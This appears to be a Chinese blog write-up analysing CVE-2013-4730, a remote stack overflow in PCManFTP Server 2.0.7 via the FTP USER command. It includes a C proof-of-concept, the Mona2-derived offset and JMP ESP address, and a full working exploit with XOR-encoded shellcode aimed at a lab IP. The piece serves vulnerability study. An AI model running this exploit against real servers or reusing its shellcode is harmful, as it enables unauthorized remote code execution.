PCManFTP v2.0漏洞分析报告
| 软件名称 | PCManFTP | 操作系统 | Windows XP |
|---|---|---|---|
| 软件版本 | 2.0 | 漏洞编号 | CVE-2013-4730 |
| 漏洞模块 | PCManFTPD2.exe | 危害等级 | 超危 |
| 模块版本 | 2.0.7 | 漏洞类型 | 缓冲区溢出 |
| 编译日期 | 2013-06-27 | 威胁类型 | 远程 |
分析人:
2019年7月31日
1.软件简介
PCManFTP Server是洪任谕程序员所研发的一套FTP服务器软件。该软件具有体积小、功能简单等特点。
[外链图片转存失败(img-35TA50ao-1564753022806)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\1564557298582.png)]
2.漏洞成因
-
CVE-2013-4730是PCMan FTP Server的2.0.7版在Windows XP下的远程溢出漏洞
-
通过查看文档可知,此软件由于未能有效处理FTP命令的字符长度,进而引发栈溢出漏洞,导致攻击者可以远程执行任何命令
-
用于FTP登录的“USER”命令即可触发此漏洞,也就是说我们在未提前获得目标的FTP访问权限的前提下,即可对其进行溢出攻击,因此这个漏洞造成的影响非常严重
3.构造触发漏洞的POC
我们需要有一份能与FTP进行交互的代码才能受控的触发此漏洞。理论上讲,只要我们编写的代码符合RFC959标准,就可以与任何一个FTP服务器进行交互不过FTP客户端的实现非常简单,我们完全没必要去阅读RFC959文档,我们只需作如下几步:
- 建立Socket链接,连接目标FTP
- 接受FTP服务器的欢迎语
- 发送“USER XXXX”登录请求
- 接受请求结果(不会走到这一步,此时FTP服务器已被攻击完)
和服务器交互的代码:
#include "stdafx.h"
#include <winsock2.h>
#include <tchar.h>
#pragma comment(lib,"Ws2_32.lib")
int _tmain(int argc, _TCHAR* argv[])
{
// 1. 初始化Winsock服务
WSADATA stWSA;
WSAStartup(0x0202, &stWSA);
// 2. 创建一个原始套接字
SOCKET stListen = INVALID_SOCKET;
stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
// 3. 在任意地址(INADDR_ANY)上绑定一个端口21
SOCKADDR_IN stService;
stService.sin_addr.s_addr = inet_addr("127.0.0.1");
stService.sin_port = htons(21);
stService.sin_family = AF_INET;
connect(stListen, (SOCKADDR*)&stService, sizeof(stService));
// 4. 接受欢迎语
char szRecv[0x100] = { 0 };
char *pCommand = "USER hello everyone";
recv(stListen, szRecv, sizeof(szRecv), 0);
// 5. 发送登陆请求
send(stListen, pCommand, strlen(pCommand), 0);
recv(stListen, szRecv, sizeof(szRecv), 0);
// 6. 关闭相关句柄并释放相关资源
closesocket(stListen);
WSACleanup();
return 0;
}
使用Mona2插件
-
Mona2是Corelan Team团队开发的一个专门用于辅助漏洞挖掘的脚本插件
-
Mona原本只支持Immunity Debugger,但是由于Immunity Debugger与OllyDbg同根同源,而OllyDbg的更新已经明显乏力,因此Mona2推出了可以在Windbg上使用的版本
-
Mona可以帮助我们快速的定位溢出点,并且可以帮助我们查找一些用于溢出的特殊指令,以及构成复杂攻击代码的小部件!
我们现在可以用Mona2生成一段3000字节长度的测试字符串,用于确定溢出点
触发溢出后可见如下回显,证明我们正要在一个不存在的位置执行代码
通过以上信息我们知道EIP被覆盖成了0x43386f43,我们可以使用如下的Mona2命令计算其溢出点
由以上结果可知,我们的溢出点在偏移2004的位置
溢出点已经确认,接下来我们需要用Mona2在目标程序空间中找到一个跳板指令“JMP ESP”
接下来可以构造我们的Exploit了
4.构造Exploit
构建一个长字符串发送登录请求
格式:“USER “+填充字节区+JMP ESP跳板指令+滑板指令区+Shellcode(前面一部分是解密代码,后面是加过密的Shellcode(不含0x00,0x0A,0x0D))+”\r\n”
#include "pch.h"
#include <winsock2.h>
#pragma comment(lib,"Ws2_32.lib")
#define KEY "\x07" // Encode Key = 0x07
#define SIZE "\x36\x01" // Payload Size = 0x0136
char bShellcode[] = \
"\x33\xC0\xE8\xFF\xFF\xFF\xFF\xC3\x58\x8D\x70\x1B\x33\xC9\x66\xB9" \
SIZE "\x8A\x04\x0E\x34" KEY "\x88\x04\x0E\xE2\xF6\x80\x34\x0E" KEY \
"\xFF\xE6" \
"\x67\x84\xEB\x27\xEC\x4B\x40\x62\x73\x57\x75\x68\x64\x46\x63\x63" \
"\x75\x62\x74\x74\x4B\x68\x66\x63\x4B\x6E\x65\x75\x66\x75\x7E\x42" \
"\x7F\x46\x07\x52\x74\x62\x75\x34\x35\x29\x63\x6B\x6B\x07\x4A\x62" \
"\x74\x74\x66\x60\x62\x45\x68\x7F\x46\x07\x42\x7F\x6E\x73\x57\x75" \
"\x68\x64\x62\x74\x74\x07\x4F\x62\x6B\x6B\x68\x27\x36\x32\x57\x45" \
"\x26\x07\xEF\x07\x07\x07\x07\x5C\x63\x8C\x32\x37\x07\x07\x07\x8C" \
"\x71\x0B\x8C\x71\x1B\x8C\x31\x8C\x51\x0F\x54\x55\xEF\x15\x07\x07" \
"\x07\x8C\xF7\x8A\x4C\xBA\x56\x55\xF8\xD7\x54\x51\x57\x55\xEF\x69" \
"\x07\x07\x07\x52\x8C\xEB\x84\xEB\x0B\x55\x8C\x52\x0F\x8C\x75\x3B" \
"\x8A\x33\x35\x8C\x71\x7F\x8A\x33\x35\x8C\x79\x1B\x8A\x3B\x3D\x8E" \
"\x7A\xFB\x8C\x79\x27\x8A\x3B\x3D\x8E\x7A\xFF\x8C\x79\x23\x8A\x3B" \
"\x3D\x8E\x7A\xF3\x34\xC7\xEC\x06\x47\x8C\x72\xFF\x8C\x33\x81\x8C" \
"\x52\x0F\x8A\x33\x35\x8C\x5A\x0B\x8A\x7C\xA8\xBE\x09\x07\x07\x07" \
"\xFB\xF4\xA1\x72\xE4\x8C\x72\xF3\x34\xF8\x61\x8C\x3B\x41\x8C\x52" \
"\xFB\x8C\x33\xBD\x8C\x52\x0F\x8A\x03\x35\x5D\x8C\xE2\x5A\xC5\x0F" \
"\x07\x52\x8C\xEB\x84\xEB\x0F\x8C\x5A\x13\x8A\x4C\xCB\x6D\x07\x6D" \
"\x07\x56\xF8\x52\x0B\x8A\x4C\xD0\x56\x57\xF8\x52\x17\x8E\x42\xFB" \
"\x8A\x4C\xE4\x56\xF8\x72\x0F\xF8\x52\x17\x8E\x42\xFF\x8A\x4C\xE8" \
"\x6D\x07\x56\x56\x6D\x07\xF8\x52\xFB\x6D\x07\xF8\x52\xFF\x8C\xE2" \
"\x5A\xC5\x17\x07\x07";
int _tmain(int argc, _TCHAR* argv[])
{
// 1. 初始化Winsock服务
WSADATA stWSA;
WSAStartup(0x0202, &stWSA);
// 2. 创建一个原始套接字
SOCKET stListen = INVALID_SOCKET;;
stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
// 3. 在任意地址(INADDR_ANY)上绑定一个端口21
SOCKADDR_IN stService;
stService.sin_addr.s_addr = inet_addr("192.168.23.131");
stService.sin_port = htons(21);
stService.sin_family = AF_INET;
connect(stListen, (SOCKADDR *)& stService, sizeof(stService));
// 4. 构造Exploit
char cExpolit[5000] = { 0x00 }; // Exploit容器
char cFill[3001] = { 0x00 }; // 填充字节
char cNOP[51] = { 0x00 }; // 滑板指令区
char cRetnAddr[5] = "\x7b\x46\x86\x7c"; // JMP ESP:0x7c86467b
memset(cFill, '\x0C', 2004); // 由Mona得到的偏移
memset(cNOP, '\x90', 20); // 少填充1字节,如果变量cNOP后面不为0x00,也会被当成字符链接进来
//sprintf_s(cExpolit, "USER %s\r\n", cFill);
sprintf_s(cExpolit, "USER %s%s%s%s\r\n", cFill, cRetnAddr, cNOP, bShellcode);
// 5. 向FTP发送Exploit
char szRecv[0x100] = { 0 };
char *pCommand = NULL;
// 5.1 接受欢迎语
recv(stListen, szRecv, sizeof(szRecv), 0);
// 5.2 发送登陆请求
send(stListen, cExpolit, strlen(cExpolit), 0);
recv(stListen, szRecv, sizeof(szRecv), 0);
// 6. 关闭相关句柄并释放相关资源
closesocket(stListen);
WSACleanup();
return 0;
}
5.漏洞利用
3810
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
